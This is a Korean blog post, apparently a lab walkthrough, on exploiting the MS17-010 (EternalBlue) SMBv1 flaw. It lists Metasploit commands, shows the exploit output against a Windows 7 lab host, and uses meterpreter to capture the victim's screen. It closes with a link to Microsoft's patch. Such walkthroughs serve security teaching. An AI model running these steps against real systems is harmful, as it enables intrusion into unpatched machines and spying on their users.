MS17-010
MS17-010은 Microsoft SMBv1 프로토콜에서 발생하는 원격 코드 실행 취약점 입니다 이 취약점은 특히 SMBv1 프로토콜의 특정 방식으로 데이터를 처리할 때 발생하는 메모리 손상 문제로, 공격자가 악의적인 SMB 요청을 보내면 대상 시스템에서 원격 코드 실행 이 가능하게 만듭니다.
Eternalblue
EternalBlue는 미국 국가안보국(NSA) 에서 개발한 해킹 툴 중 하나였습니다
하지만
2017년 Shadow Brokers라는 해커 그룹이 EternalBlue 툴을 유출하면서 이 취약점은 공개되 MS17-010 이라는 취약점이
세상에 알려졌습니다
CVE-2017-0143
| 공격자 | 10.0.2.5 |
| 피해자 | 10.0.2.15 |
msfconsole
메타스플로잇을 켜줍니다
그후 모듈 검색
search eternalblue
show options
set RHOSTS [IP]
타겟 아이피 설정후
exploit
해당 서버가 MS17-010 에 취약하다는 문구가 뜬후
[+] 10.0.2.15:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Premium 7601 Service Pack 1 x64 (64-bit)
악성 SMB 패킷을 제작하여 보냅니다
[*] 10.0.2.15:445 - Sending all but last fragment of exploit packet
[+] 10.0.2.15:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.0.2.15:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.0.2.15:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
WIN 문구가 뜨면서 침투에 성공 했습니다
meterpreter
공격자 세션에 있는 meterpreter screenshot 옵션 기능을 활용하여
피해자 시점에 있는 화면을 캡쳐 해보겠습니다
screenshot
성공적으로 파일에 피해자 시점에 화면이 그대로 저장 됬습니다
마치며
오늘은 eternalblue ms17 010 취약점에 대헤 배워봤습니다
이와 같은 상황을 대비하기 위해
MS17-010: Security update for Windows SMB Server: March 14, 2017 - Microsoft Support
Explore subscription benefits, browse training courses, learn how to secure your device, and more. Communities help you ask and answer questions, give feedback, and hear from experts with rich knowledge.
support.microsoft.com
이렇게 패치버전도 있습니다
여기까지 봐주셔서 감사합니다
'취약점 | CVE' 카테고리의 다른 글
| SMB 프로토콜 이해하기 (0) | 2025.04.13 |
|---|---|
| [CVE-2011-2523] vsftpd 2.3.4 - 백도어 취약점 (0) | 2025.01.14 |
| [CVE-2024-1017] [POC] Wordpress SQL 인젝션 취약점 (0) | 2024.10.01 |